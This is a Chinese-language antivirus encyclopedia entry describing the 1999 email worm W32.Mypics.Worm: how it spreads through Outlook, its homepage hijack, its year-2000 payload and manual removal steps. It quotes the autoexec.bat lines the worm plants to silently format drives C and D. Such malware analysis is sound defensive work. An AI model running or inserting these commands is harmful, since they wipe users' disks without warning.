W32.Mypics.Worm详细资料

Emil

病毒名称：W32.Mypics.Worm
别名： W32.Mypics.Worm (bat), W32.Mypics.Worm (com),
Worm.Mypics, Pics4you, Cbios, Troj.Mypics
发作时间：2000年任何一天
长度： 34,304字节
感染症状：IE的“主页”被修改为黄色网站
发作症状：显示BIOS错误，格式化硬盘
病毒类型：内存驻留型特洛伊木马蠕虫
操作平台：Windows 9x/NT
感染对象：无
病毒性质：恶性
病毒介绍：W32.Mypics.Worm蠕虫病毒是在1999年12月2日晚上被发现的。
该蠕虫能在Windows 9x/NT操作平台下自动通过电子邮件来传
播，并含有一个会在2000年发作的恶性程序片断。
该蠕虫会自动按Outlook地址簿里面的50个邮件地址发送
含有病毒本身的电子邮件，没有标题，内容为：
Here's some pictures for you!
附件为pics4you.exe，大小为34,304字节，这就是病毒的本
身。以此欺骗收件人相信这是一些图片而打开它。
当运行了该附件后，并不会显示什么图片，看上去好像
没有什么改变，但该蠕虫已经驻留内存，并准备向外发送电
子邮件。该蠕虫还会把IE的“主页”修改为：
http://www.geocities.com/SiliconValley/Vista/8279/
index.html（注：色情网站）
并修改注册表以使得系统每次启动的时候病毒都能运行并驻
留内存。
该蠕虫含有两个类似Y2K问题的程序片断。
首先，该蠕虫监听系统的时间，当时间是2000年时，它
就会修改BIOS，在下次启动计算机的时候就会显示：
"CMOS Checksum Invalid"
使得计算机无法启动，这会使用户在计算机启动时错以为计
算机BIOS有Y2K问题，但用户可以进入BIOS来进行修复。当
BIOS被修复再次重新启动后，该蠕虫就会运行它的第二个恶
意程序片断，格式化硬盘！
当在2000年的某一天，如2000年1月1日，该蠕虫就会生
成并运行一个名为CBIOS.COM的文件，并修改autoexec.bat。
CBIOS.COM大小为15字节，是用汇编语言来编写的，其目的
是修改宿主主机CMOS中的校验和数据（checksum data），
BIOS就会显示错误信息。不过这是可以通过重新设置来修复
的。CBIOS.COM就被命名为W32.Mypics.Worm (com)病毒。
该蠕虫对autoexec.bat所做的修改如下：
ctty nul

format d: /autotest /q /u

format c: /autotest /q /u
这样，在系统启动的时候就会格式化C盘和D盘，这个autoex-
ec.bat就被命名为W32.Mypics.Worm (bat)。
备注： 该蠕虫是用MS VB来编写的，在运行时必须使用一个名为MSV-
BVM50.DLL动态联接库，换句话说，宿主机上必须由这个文件
该蠕虫才能运行，但该文件不会随病毒一起传播。
该蠕虫可以通过手工来清除：
首先，按下Ctrl+Alt+Del就会在关闭程序对话框里看到
名为MYPICS的程序，点击该程序再点击“结束任务”来终止
该蠕虫的运行。
其次，修改注册表：
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curre-
ntVersion\Run= C:\Pics4You.Exe
或
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\Win-
dows\Run= C:\Pics4You.Exe
删除其中的C:\Pics4You.Exe，并删除所有的Pics4You.Exe。
第三，检查auotexec.bat，如果已经被病毒修改了，修
正后就可以恢复。
第四，查找CBIOS.COM，如果存在就把它删除。
第五，把IE里的“主页”修正。